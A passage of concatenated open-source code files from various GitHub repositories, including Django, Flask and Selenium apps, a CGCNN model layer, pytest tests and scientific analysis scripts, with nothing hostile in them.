self.valor_total > 0\n\n if completo and self.tipo_transacao.tem_documento:\n completo = completo and self.documento_transacao\n\n if completo and self.tipo_documento.numero_documento_digitado:\n completo = completo and self.numero_documento\n\n if completo:\n for rateio in self.rateios.all():\n completo = completo and rateio.status == STATUS_COMPLETO\n\n return completo\n\n def atualiza_status(self):\n cadastro_completo = self.cadastro_completo()\n status_completo = self.status == STATUS_COMPLETO\n if cadastro_completo != status_completo:\n self.save() # Força um rec'alculo do status.\n\n @classmethod\n def by_documento(cls, tipo_documento, numero_documento, cpf_cnpj_fornecedor, associacao__uuid):\n return cls.objects.filter(associacao__uuid=associacao__uuid).filter(\n cpf_cnpj_fornecedor=cpf_cnpj_fornecedor).filter(tipo_documento=tipo_documento).filter(\n numero_documento=numero_documento).first()\n class Meta:\n verbose_name = \"Despesa\"\n verbose_name_plural = \"Despesas\"\n\n\n@receiver(pre_save, sender=Despesa)\ndef proponente_pre_save(instance, **kwargs):\n instance.status = STATUS_COMPLETO if instance.cadastro_completo() else STATUS_INCOMPLETO\n\n\n@receiver(post_save, sender=Despesa)\ndef rateio_post_save(instance, created, **kwargs):\n # Existe um motivo para o fornecedor não ser uma FK nesse modelo e ele ser atualizado indiretamente\n # A existência da tabela de fornecedores é apenas para facilitar o preenchimento da despesa pelas associações\n # Alterações feitas por uma associação no nome de um fornecedor não deve alterar diretamente as despesas de outras\n if instance and instance.cpf_cnpj_fornecedor and instance.nome_fornecedor:\n Fornecedor.atualiza_ou_cria(cpf_cnpj=instance.cpf_cnpj_fornecedor, nome=instance.nome_fornecedor)\n\n\nauditlog.register(Despesa)\n","repo_name":"ollyvergithub/SME-PTRF-BackEnd","sub_path":"sme_ptrf_apps/despesas/models/despesa.py","file_name":"despesa.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"286272498","text":"\"\"\"\n see on psana\n /cds/sw/ds/ana/conda1/manage/bin/psconda.sh # lcls1\n /cds/sw/ds/ana/conda2/manage/bin/psconda.sh # lcls2\n see on s3df\n /sdf/group/lcls/ds/ana/sw/conda1/manage/bin/psconda.sh # lcls1\n /sdf/group/lcls/ds/ana/sw/conda2/manage/bin/psconda.sh # lcls2\n\n DIR_ROOT for repositories and logfiles through the environment variable:\n /reg/g/psdm # lcls\n /cds/group/psdm # lcls2\n /sdf/group/psdm # s3df ???\n\n DIR_PSDM\n /cds/group/psdm # on psana lcls2\n /cds/group/psdm # on sdflogin lcls2\n\n SIT_PSDM_DATA\n /sdf/data/lcls/ds/\n\n ffb data\n /sdf/data/lcls/drpsrcf/ffb/\n\nfrom psana.detector.dir_root import DIR_ROOT, DIR_REPO\n\"\"\"\nimport os\n\nHOSTNAME = os.getenv('HOSTNAME', None) # ex: pslogin02\nif HOSTNAME is None:\n import socket\n HOSTNAME = socket.gethostname()\n#print('TEST dir_root.HOSTNAME %s' % HOSTNAME)\n\nDIR_ROOT = os.getenv('DIR_PSDM') # /cds/group/psdm\nDIR_LOG_AT_START = os.path.join(DIR_ROOT, 'detector/logs/atstart/') # /cds/group/psdm/detector/logs/atstart\nDIR_REPO = os.path.join(DIR_ROOT, 'detector/calib2/constants') # common repository\nDIR_REPO_EPIX10KA = DIR_REPO\n#DIR_REPO_EPIX10KA = os.path.join(DIR_ROOT, 'detector/gains2/epix10ka/panels') # /cds/group/psdm/detector/gains2/epix10ka/panels\n#DIR_REPO_DARK_PROC = DIR_REPO\n#DIR_REPO_DARK_PROC = os.path.join(DIR_ROOT, 'detector/calib2') # /cds/group/psdm/detector/calib2\nDIR_DATA_TEST = os.path.join(DIR_ROOT, 'detector/data2_test') # /cds/group/psdm/detector/data2_test/\nDIR_REPO_CALIBMAN = DIR_REPO # prev: /cds/group/psdm/detector/calib2/constants/logs\n#DIR_LOG_CALIBMAN = os.path.join(DIR_ROOT, 'detector/logs/calibman/lcls2') # /cds/group/psdm/detector/logs/calibman/lcls2\n\n# for s3df\nDIR_DATA = os.getenv('SIT_PSDM_DATA', '/sdf/data/lcls/ds') # /sdf/data/lcls/ds/\nDIR_FFB = os.path.join(DIR_DATA, '../drpsrcf/ffb').replace('/ds/../','/') # '/sdf/data/lcls/drpsrcf/ffb'\n# EOF\n","repo_name":"slac-lcls/lcls2","sub_path":"psana/psana/detector/dir_root.py","file_name":"dir_root.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"} +{"seq_id":"70917028808","text":"import cv2\nimport datetime\nfrom pyzbar.pyzbar import decode \n\nCam = cv2.VideoCapture(0)\ndetector = cv2.QRCodeDetector()\nwhile True:\n _,img=Cam.read()\n data,one, _=detector.detectAndDecode(img)\n success, frame = Cam.read()\n if data:\n a=data\n break\n cv2.imshow('Smile!',img)\n if cv2.waitKey(1)==ord('v'):\n continue\n for captureinfomartions in decode(frame):\n #Convert Informations to text file\n Make_txt_file = open(\"Information.txt\", \"w\")\n Make_txt_file.write(f\"{captureinfomartions.data.decode('utf-8')}\\n\" )\n \n #Add the time and date when data is scanned\n Date = datetime.datetime.now()\n Make_txt_file.write(Date.strftime(\"Date: %m/%d/%y \\n\"))\n Make_txt_file.write(Date.strftime(\"Time: %H:%M:%S\")) \n Make_txt_file.close()\n\nCam.release(a)\ncv2.destroyAllWindows()","repo_name":"edgarpesguerrajr/Assignment10","sub_path":"10.1.py","file_name":"10.1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43494410943","text":"\"\"\"Tests for the submission metadata parser.\"\"\"\n\nfrom importlib.resources import files\nfrom os.path import join as pathjoin\nfrom pathlib import Path\nfrom shutil import copyfileobj\n\nimport pytest\n\nfrom aga.gradescope.metadata import (\n GradescopeAssignmentMetadata,\n GradescopeSubmissionMetadata,\n load_submission_metadata_from_path,\n)\n\n\ndef test_example_metadata_id(example_metadata: GradescopeSubmissionMetadata) -> None:\n \"\"\"Test that the example metadata file's id is correct.\"\"\"\n assert example_metadata.id == 123456\n\n\ndef test_example_metadata_upload(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's upload is correct.\"\"\"\n assert example_metadata.submission_method == \"upload\"\n\n\ndef test_example_metadata_created_at(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's created at is correct.\"\"\"\n time = example_metadata.created_at\n assert time.year == 2018\n assert time.month == 7\n assert time.day == 1\n assert time.hour == 14\n assert time.minute == 22\n assert time.second == 32\n\n\ndef test_example_metadata_previous_submissions(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous submissions is empty.\"\"\"\n assert example_metadata.previous_submissions == []\n\n\ndef test_example_metadata_users(\n example_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that the example metadata file's previous user is correct.\"\"\"\n users = example_metadata.users\n assert len(users) == 1\n\n user = users[0]\n assert user.email == \"student@example.com\"\n assert user.id == 1234\n assert user.name == \"Student User\"\n\n\n@pytest.fixture(name=\"example_metadata_assignment\")\ndef fixture_example_metadata_assignment(\n example_metadata: GradescopeSubmissionMetadata,\n) -> GradescopeAssignmentMetadata:\n \"\"\"Get the example metadata's assignment object.\"\"\"\n return example_metadata.assignment\n\n\ndef test_example_assignment_metadata_name(\n example_metadata_assignment: GradescopeAssignmentMetadata,\n) -> None:\n \"\"\"Test that the example metadata's assignment's name is correct.\"\"\"\n assert example_metadata_assignment.title == \"Programming Assignment 1\"\n\n\n@pytest.fixture(name=\"late_due_date_metadata\")\ndef fixture_late_due_date_metadata(tmp_path: Path) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"metadata_with_late_due_date.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\n@pytest.fixture(name=\"multiple_submission_metadata\")\ndef fixture_multiple_submission_metadata(\n tmp_path: Path,\n) -> GradescopeSubmissionMetadata:\n \"\"\"Get a path with the example metadata file from the gradescope documentation.\"\"\"\n path = pathjoin(tmp_path, \"metadata.json\")\n\n with files(\"tests.test_gradescope.resources\").joinpath( # type: ignore\n \"multiple_submission_metadata.json\"\n ).open() as src:\n with open(path, \"w\", encoding=\"UTF-8\") as dest:\n copyfileobj(src, dest)\n\n return load_submission_metadata_from_path(path)\n\n\ndef test_late_due_date(late_due_date_metadata: GradescopeSubmissionMetadata) -> None:\n \"\"\"Test that we properly loda late due dates.\"\"\"\n assert late_due_date_metadata.assignment.late_due_date is not None\n assert late_due_date_metadata.assignment.late_due_date.year == 2022\n assert late_due_date_metadata.assignment.late_due_date.month == 8\n\n\ndef test_multiple_submission(\n multiple_submission_metadata: GradescopeSubmissionMetadata,\n) -> None:\n \"\"\"Test that we properly load previous submissions.\"\"\"\n assert len(multiple_submission_metadata.previous_submissions) == 4\n","repo_name":"nihilistkitten/aga","sub_path":"tests/test_gradescope/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"26021583196","text":"# Задача 1\n# На столе лежат n монеток. Некоторые из них лежат вверх решкой, \n# а некоторые – гербом. Определите минимальное число монеток, \n# которые нужно перевернуть, чтобы все монетки были повернуты \n# вверх одной и той же стороной. Выведите минимальное количество \n# монет, которые нужно перевернуть\n# 5 -> 1 0 1 1 0\n# 2\n\nprint('----------------------------------')\ncount = int(input(\"Введите количество монет \"))\nprint(\"1 = орел, 0 = решка\")\n\ncoin = [0] * count # массив монет\ntails = 0 # кол-во решек\n\nfor i in range(0, count): # да, я мог написать вместо range -> count, но тогда бы я не смогу выводить счет монет \n coin[i] = int(input(f\"{i + 1} монета лежит вверх: \"))\n if coin[i] == 0:\n tails = tails + 1\n\nprint()\nif tails < (count / 2):\n print(tails)\nelse:\n print(count - tails)\nprint('----------------------------------')","repo_name":"GRxAK/Python_start","sub_path":"lesson_02/homework_01.py","file_name":"homework_01.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19008540681","text":"from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http.response import JsonResponse\n\n# Imports to recommendations\nimport numpy as np\nimport nltk\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport ast\nimport pandas as pd\nimport json\n\nps = PorterStemmer()\ncv = CountVectorizer(max_features = 5000, stop_words='english')\nrecetas = pd.read_csv('./RecomendApp/recetas.csv')\nrecetas = recetas[['_id', 'nombre', 'calorias', 'carbohidratos', 'categoria', 'grasa', 'proteina', 'tiempoPreparacion', 'ingredientes']]\n\ndef convert(obj):\n L = []\n for i in ast.literal_eval(obj):\n L.append(i['idIngrediente'])\n return L\n\ndef convert2(obj):\n L = []\n for i in json.loads(obj):\n if i['vegetarian'] == \"true\":\n L.append('vegetarian')\n else:\n L.append('novegetarian')\n\n if i['vegan'] == \"true\":\n L.append('vegan')\n else:\n L.append('novegan')\n\n if i['glutenFree'] == \"true\":\n L.append('glutenfree')\n else:\n L.append('noglutenfree')\n\n if i['dairyFree'] == \"true\":\n L.append('dairyfree')\n else:\n L.append('nodairyfree')\n\n if i['veryHealthy'] == \"true\":\n L.append('veryHealthy')\n else:\n L.append('noveryHealthy')\n\n return L\n\ndef convert3(obj):\n L = []\n L.append(str(obj))\n return L\n\ndef stem(text):\n y = []\n\n for i in text.split():\n y.append(ps.stem(i))\n return \" \".join(y)\n\ndef recommend(receta):\n recomend = []\n receta = int(receta)\n receta_index = new_df[new_df['_id'] == receta].index[0]\n distances = similarity[receta_index]\n recetas_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\n\n for i in recetas_list:\n recomend.append(recetas.iloc[i[0]]._id)\n\n return recomend\n\nrecetas['ingredientes'] = recetas['ingredientes'].apply(convert)\nrecetas['categoria'] = recetas['categoria'].apply(convert2)\n\nrecetas['categoria'] = recetas['categoria'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\nrecetas['ingredientes'] = recetas['ingredientes'].apply(lambda x:[i.replace(\" \",\"\") for i in x])\n\nrecetas['calorias'] = recetas['calorias'].apply(convert3)\nrecetas['carbohidratos'] = recetas['carbohidratos'].apply(convert3)\nrecetas['grasa'] = recetas['grasa'].apply(convert3)\nrecetas['proteina'] = recetas['proteina'].apply(convert3)\nrecetas['tiempoPreparacion'] = recetas['tiempoPreparacion'].apply(convert3)\n\nrecetas['tags'] = recetas['calorias'] + recetas['carbohidratos'] + recetas['grasa'] + recetas['proteina'] + recetas['tiempoPreparacion'] + recetas['ingredientes'] + recetas['categoria']\nnew_df = recetas[['_id', 'nombre', 'tags']]\nnew_df['tags'] = new_df['tags'].apply(lambda x:\" \".join(x))\nnew_df['tags'] = new_df['tags'].apply(lambda x:x.lower())\nnew_df['tags'] = new_df['tags'].apply(stem)\n\nvectors = cv.fit_transform(new_df['tags']).toarray()\nsimilarity = cosine_similarity(vectors)\n\n# Create your views here.\n\n@csrf_exempt\ndef recomendarApi(request, title):\n if request.method=='GET':\n recomendacion = recommend(title)\n response = np.array(recomendacion, dtype=np.int32)\n return JsonResponse({\"response\": response.tolist()}, safe=False)\n\n@csrf_exempt\ndef recomendarHistorialApi(request,historial):\n if request.method=='GET':\n x = historial.split(',')\n y = []\n for i in x:\n recommendation = recommend(i)\n for j in recommendation:\n y.append(j)\n\n response = np.array(y, dtype=np.int32)\n return JsonResponse({\"recomend\": response.tolist()},safe=False)","repo_name":"Emerdinger/api-django","sub_path":"RecomendApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23805695787","text":"from flask import render_template,request,redirect,url_for,abort,flash\nfrom . import main\nfrom flask_login import login_required,current_user\nfrom ..models import User,Pitch,Comment\nfrom .forms import UpdateProfile,PitchForm,CommentForm\nfrom .. import db,photos\n# import markdown2\n\n# Views\n@main.route('/')\ndef index():\n\n '''\n View root page function that returns the index page and its data\n '''\n title = 'Pitch Application'\n pitch = Pitch.query.all()\n # categories = Category.get_categories()\n return render_template('index.html',title = title, Pitch = pitch)\n\n@main.route('/pitch/new', methods=['GET','POST'])\n@login_required\ndef new_pitch():\n form=PitchForm()\n if form.validate_on_submit():\n pitches=Pitch(category=form.category.data,pitch_content=form.content.data)\n db.session.add(pitches)\n db.session.commit()\n\n flash('pitch created')\n\n pitches=Pitch.query.all()\n return render_template('pitch.html',form=form, pitch=pitches)\n\n\n@main.route('/category/')\ndef category(id):\n\n category = PitchCategory.query.get(id)\n category_name = PitchCategory.query.get(category_name)\n\n if category is None:\n abort(404)\n\n pitch_in_category = Pitch.get_pitch(id)\n return render_template('category.html' ,category= category, pitch= pitch_in_category)\n\n\n@main.route('/pitch/comments/new/',methods = ['GET','POST'])\n@login_required\ndef new_comment(id):\n form = CommentForm()\n if form.validate_on_submit():\n new_comment = Comment(pitch_id =id,data=form.comment.data)\n new_comment.save_comment()\n return redirect(url_for('main.new_pitch'))\n return render_template('ncomment.html', form=form)\n\n@main.route('/comments/')\ndef single_comment(id):\n comment=Comment.query.get(id)\n if comment is None:\n abort(404)\n return render_template('new_comment.html')\n\n@main.route('/view/comment/')\ndef view_comments(id):\n '''\n Function that shows the comments of a particular pitch\n '''\n comments = Comment.get_comments(id)\n \n return render_template('viewcomment.html',comments = comments, id=id)\n\n@main.route('/user/')\ndef profile(uname):\n user = User.query.filter_by(username = uname).first()\n\n if user is None:\n abort(404)\n\n return render_template(\"profile/profile.html\",user = user)\n\n@main.route('/user//update',methods = ['GET','POST'])\n@login_required\ndef update_profile(uname):\n user = User.query.filter_by(username = uname).first()\n if user is None:\n abort(404)\n\n form = UpdateProfile()\n\n if form.validate_on_submit():\n user.bio = form.bio.data\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(url_for('.profile',uname=user.username))\n\n return render_template('profile/update.html',form =form)\n\n@main.route('/user//update/pic',methods= ['POST'])\n@login_required\ndef update_pic(uname):\n user = User.query.filter_by(username = uname).first()\n if 'photo' in request.files:\n filename = photos.save(request.files['photo'])\n path = f'photos/{filename}'\n user.profile_pic_path = path\n db.session.commit()\n return redirect(url_for('main.profile',uname=uname))","repo_name":"edithamadi/pitch_one","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"576660781","text":"# MOFTransformer version 2.0.0\r\nimport random\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass ConvLayer(nn.Module):\r\n \"\"\"\r\n Convolutional operation on graphs\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(self, atom_fea_len, nbr_fea_len):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.fc_full = nn.Linear(\r\n 2 * self.atom_fea_len + self.nbr_fea_len, 2 * self.atom_fea_len\r\n )\r\n self.sigmoid = nn.Sigmoid()\r\n self.softplus1 = nn.Softplus()\r\n self.bn1 = nn.BatchNorm1d(2 * self.atom_fea_len)\r\n self.bn2 = nn.BatchNorm1d(self.atom_fea_len)\r\n self.softplus2 = nn.Softplus()\r\n\r\n def forward(self, atom_in_fea, nbr_fea, nbr_fea_idx):\r\n \"\"\"\r\n Forward pass\r\n\r\n N: Total number of atoms in the batch\r\n M: Max number of neighbors\r\n\r\n Args:\r\n atom_in_fea: Variable(torch.Tensor) shape (N, atom_fea_len)\r\n Atom hidden features before convolution\r\n nbr_fea: Variable(torch.Tensor) shape (N, M, nbr_fea_len)\r\n Bond features of each atom's M neighbors\r\n nbr_fea_idx: torch.LongTensor shape (N, M)\r\n Indices of M neighbors of each atom\r\n\r\n Returns:\r\n\r\n atom_out_fea: nn.Variable shape (N, atom_fea_len)\r\n Atom hidden features after convolution\r\n\r\n \"\"\"\r\n\r\n N, M = nbr_fea_idx.shape\r\n # convolution\r\n atom_nbr_fea = atom_in_fea[nbr_fea_idx, :] # [N, M, atom_fea_len]\r\n\r\n total_nbr_fea = torch.cat(\r\n [\r\n atom_in_fea.unsqueeze(1).expand(N, M, self.atom_fea_len),\r\n # [N, atom_fea_len] -> [N, M, atom_fea_len] -> v_i\r\n atom_nbr_fea, # [N, M, atom_fea_len] -> v_j\r\n nbr_fea,\r\n ], # [N, M, nbr_fea_len] -> u(i,j)_k\r\n dim=2,\r\n )\r\n # [N, M, atom_fea_len*2+nrb_fea_len]\r\n\r\n total_gated_fea = self.fc_full(total_nbr_fea) # [N, M, atom_fea_len*2]\r\n total_gated_fea = self.bn1(\r\n total_gated_fea.view(-1, self.atom_fea_len * 2)\r\n ).view(\r\n N, M, self.atom_fea_len * 2\r\n ) # [N, M, atom_fea_len*2]\r\n nbr_filter, nbr_core = total_gated_fea.chunk(2, dim=2) # [N, M, atom_fea_len]\r\n nbr_filter = self.sigmoid(nbr_filter)\r\n nbr_core = self.softplus1(nbr_core)\r\n nbr_sumed = torch.sum(nbr_filter * nbr_core, dim=1) # [N, atom_fea_len]\r\n nbr_sumed = self.bn2(nbr_sumed)\r\n out = self.softplus2(atom_in_fea + nbr_sumed) # [N, atom_fea_len]\r\n return out\r\n\r\n\r\nclass GraphEmbeddings(nn.Module):\r\n \"\"\"\r\n Generate Embedding layers made by only convolution layers of CGCNN (not pooling)\r\n (https://github.com/txie-93/cgcnn)\r\n \"\"\"\r\n\r\n def __init__(\r\n self, atom_fea_len, nbr_fea_len, max_graph_len, hid_dim, n_conv=3, vis=False\r\n ):\r\n super().__init__()\r\n self.atom_fea_len = atom_fea_len\r\n self.nbr_fea_len = nbr_fea_len\r\n self.max_graph_len = max_graph_len\r\n self.hid_dim = hid_dim\r\n self.embedding = nn.Embedding(119, atom_fea_len) # 119 -> max(atomic number)\r\n self.convs = nn.ModuleList(\r\n [\r\n ConvLayer(atom_fea_len=atom_fea_len, nbr_fea_len=nbr_fea_len)\r\n for _ in range(n_conv)\r\n ]\r\n )\r\n self.fc = nn.Linear(atom_fea_len, hid_dim)\r\n\r\n self.vis = vis\r\n\r\n def forward(\r\n self, atom_num, nbr_idx, nbr_fea, crystal_atom_idx, uni_idx, uni_count, moc=None\r\n ):\r\n \"\"\"\r\n Args:\r\n atom_num (tensor): [N', atom_fea_len]\r\n nbr_idx (tensor): [N', M]\r\n nbr_fea (tensor): [N', M, nbr_fea_len]\r\n crystal_atom_idx (list): [B]\r\n uni_idx (list) : [B]\r\n uni_count (list) : [B]\r\n Returns:\r\n new_atom_fea (tensor): [B, max_graph_len, hid_dim]\r\n mask (tensor): [B, max_graph_len]\r\n \"\"\"\r\n assert self.nbr_fea_len == nbr_fea.shape[-1]\r\n\r\n atom_fea = self.embedding(atom_num) # [N', atom_fea_len]\r\n for conv in self.convs:\r\n atom_fea = conv(atom_fea, nbr_fea, nbr_idx) # [N', atom_fea_len]\r\n atom_fea = self.fc(atom_fea) # [N', hid_dim]\r\n\r\n new_atom_fea, mask, mo_label = self.reconstruct_batch(\r\n atom_fea, crystal_atom_idx, uni_idx, uni_count, moc\r\n )\r\n # [B, max_graph_len, hid_dim], [B, max_graph_len]\r\n return new_atom_fea, mask, mo_label # None will be replaced with MOC\r\n\r\n def reconstruct_batch(self, atom_fea, crystal_atom_idx, uni_idx, uni_count, moc):\r\n batch_size = len(crystal_atom_idx)\r\n\r\n new_atom_fea = torch.full(\r\n size=[batch_size, self.max_graph_len, self.hid_dim], fill_value=0.0\r\n ).to(atom_fea)\r\n\r\n mo_label = torch.full(\r\n size=[batch_size, self.max_graph_len], fill_value=-100.0\r\n ).to(atom_fea)\r\n\r\n for bi, c_atom_idx in enumerate(crystal_atom_idx):\r\n # set uni_idx with (descending count or random) and cut max_graph_len\r\n idx_ = torch.LongTensor([random.choice(u) for u in uni_idx[bi]])[\r\n : self.max_graph_len\r\n ]\r\n rand_idx = idx_[torch.randperm(len(idx_))]\r\n if self.vis:\r\n rand_idx = idx_\r\n new_atom_fea[bi][: len(rand_idx)] = atom_fea[c_atom_idx][rand_idx]\r\n\r\n if moc:\r\n mo = torch.zeros(len(c_atom_idx))\r\n metal_idx = moc[bi]\r\n mo[metal_idx] = 1\r\n mo_label[bi][: len(rand_idx)] = mo[rand_idx]\r\n\r\n mask = (new_atom_fea.sum(dim=-1) != 0).float()\r\n\r\n return new_atom_fea, mask, mo_label\r\n","repo_name":"hspark1212/MOFTransformer","sub_path":"moftransformer/modules/cgcnn.py","file_name":"cgcnn.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"16"} +{"seq_id":"28896004403","text":"def solution(s, e, sum1):\n global flag, K\n\n if flag == 1:\n return\n if sum1 > K:\n return\n if sum1 == K:\n flag = 1\n return\n if s == e:\n return\n\n solution(s+1, e, sum1)\n solution(s+1, e, sum1+data[s])\n\n\nT = int(input())\nfor i in range(T):\n N, K = map(int, input().split())\n data = list(map(int, input().split()))\n flag = 0\n solution(0, N, 0)\n if flag == 1:\n print(\"YES\")\n else:\n print(\"NO\")\n\n\n","repo_name":"jho0078/til","sub_path":"algorithm/D24_2019_03_28(AD)/더하기.py","file_name":"더하기.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"307703819","text":"from bs4 import BeautifulSoup as BS\nfrom selenium import webdriver\nfrom msedge.selenium_tools import Edge, EdgeOptions\nfrom selenium.webdriver.common.keys import Keys\nfrom werkzeug.wrappers import response\nfrom data import Twitter\nfrom scripts import tweeting\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Protocol.KDF import PBKDF2\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nimport time\n\n#login data\n# username = Twitter['username']\n# password = Twitter['password']\n\n# salt storing\nsalt = b'\\xec\\x86\\xc6\\xcao?3`.\\xe8\\x86\\x0b\\xcd?I\\x8dV\\x808c\\x94\\x03\\x95~\\xf3\\xb7 problem is the instienace\n# functional programming =>","repo_name":"OsamaElsherif/socialmedia","sub_path":"webApplication/twiiter.py","file_name":"twiiter.py","file_ext":"py","file_size_in_byte":7545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28924195510","text":"#!/usr/bin/env python\n\n\"\"\"\nStart the process and dump the documentation to the doc dir\n\"\"\"\n\nimport socket, subprocess, time,os\n\nenv = os.environ\nenv['L1FWD_BTS_HOST'] = '127.0.0.1'\n\nbts_proc = subprocess.Popen([\"./src/osmo-bts-sysmo/sysmobts-remote\",\n\t\t\"-c\", \"./doc/examples/sysmo/osmo-bts-sysmo.cfg\"], env = env,\n\t\tstdin=None, stdout=None)\ntime.sleep(1)\n\ntry:\n\tsck = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tsck.setblocking(1)\n\tsck.connect((\"localhost\", 4241))\n\tsck.recv(4096)\n\n\t# Now send the command\n\tsck.send(\"show online-help\\r\")\n\txml = \"\"\n\twhile True:\n\t\tdata = sck.recv(4096)\n\t\txml = \"%s%s\" % (xml, data)\n\t\tif data.endswith('\\r\\nOsmoBTS> '):\n\t\t\tbreak\n\n\t# Now write everything until the end to the file\n\tout = open('doc/vty_reference.xml', 'w')\n\tout.write(xml[18:-11])\n\tout.close()\nfinally:\n\t# Clean-up\n\tbts_proc.kill()\n\tbts_proc.wait()\n\n","repo_name":"osmocom/osmo-bts","sub_path":"contrib/dump_docs.py","file_name":"dump_docs.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"16"} +{"seq_id":"73390894408","text":"from django.contrib import admin\r\nfrom .models import Product, Order, OrderItem\r\n\r\n\r\nclass ProductAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product_name', 'stock')\r\n ordering = ('-stock',)\r\n\r\n\r\nclass OrderAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('source', 'order_id')\r\n\r\n\r\nclass OrderItemAdmin(admin.ModelAdmin):\r\n \"\"\"To change view in admin page\"\"\"\r\n list_display = ('product',)\r\n\r\n\r\n# Register your models here.\r\nadmin.site.register(Product, ProductAdmin)\r\nadmin.site.register(Order, OrderAdmin)\r\nadmin.site.register(OrderItem, OrderItemAdmin)\r\n","repo_name":"harikrishna-gujje/ecommerce_api","sub_path":"simpleapi/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"14014173799","text":"import os, time, json, argparse\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom EventIDs import IDs\nfrom Plot_maker import low_stat_Z\n\nprint(xgb.__version__)\n\nt0 = time.time()\nstart = time.asctime(time.localtime())\nprint('Started', start)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--met_reg', type=str, default=\"50-100\", help=\"MET signal region\")\nparser.add_argument('--dm_model', type=str, default=\"DH_HDS\", help=\"Dataset to test\")\nparser.add_argument('--channel', type=str, default=\"ee\", help=\"Lepton channel to test\")\nargs = parser.parse_args()\n\nmet_reg = args.met_reg\ndm_model = args.dm_model\nchannel = args.channel \n\n\n\nN = 9\nplt.rcParams[\"axes.prop_cycle\"] = plt.cycler(\"color\", plt.cm.PuRd_r(np.linspace(0.1,0.95,N)))\n\ndef Z_score_array(sig_pred, bkg_pred):\n np.seterr(divide='ignore', invalid='ignore') # Remove true divide message\n return [low_stat_Z(sum(sig_pred[25:]), sum(bkg_pred[25:])), \n low_stat_Z(sum(sig_pred[30:]), sum(bkg_pred[30:])), \n low_stat_Z(sum(sig_pred[35:]), sum(bkg_pred[35:])),\n low_stat_Z(sum(sig_pred[40:]), sum(bkg_pred[40:])), \n low_stat_Z(sum(sig_pred[45:]), sum(bkg_pred[45:])), \n low_stat_Z(sig_pred[-1], bkg_pred[-1])]\n\nnp_dir = '/storage/racarcam/Data/XGB_frfr/'+met_reg+'/'+dm_model+'/'\n\nsig_mzp_130 = np.load(np_dir+'mZp_130/sig_pred_'+channel+'.npy')\nsig_mzp_200 = np.load(np_dir+'mZp_200/sig_pred_'+channel+'.npy')\nsig_mzp_400 = np.load(np_dir+'mZp_400/sig_pred_'+channel+'.npy')\nsig_mzp_600 = np.load(np_dir+'mZp_600/sig_pred_'+channel+'.npy')\n\nbkg_mzp_130 = np.load(np_dir+'mZp_130/bkg_pred_'+channel+'.npy')\nbkg_mzp_200 = np.load(np_dir+'mZp_200/bkg_pred_'+channel+'.npy')\nbkg_mzp_400 = np.load(np_dir+'mZp_400/bkg_pred_'+channel+'.npy')\nbkg_mzp_600 = np.load(np_dir+'mZp_600/bkg_pred_'+channel+'.npy')\n\nmodel_dsids = []\njson_file = open('DM_DICT_Zp_dsid.json')\nDM_file = json.load(json_file)\nfor key in DM_file.keys():\n word = key.split('_')\n model_sec = word[0]+'_'+word[1]\n if model_sec == dm_model.lower():\n model_dsids.append(DM_file[key])\n\njson_file2 = 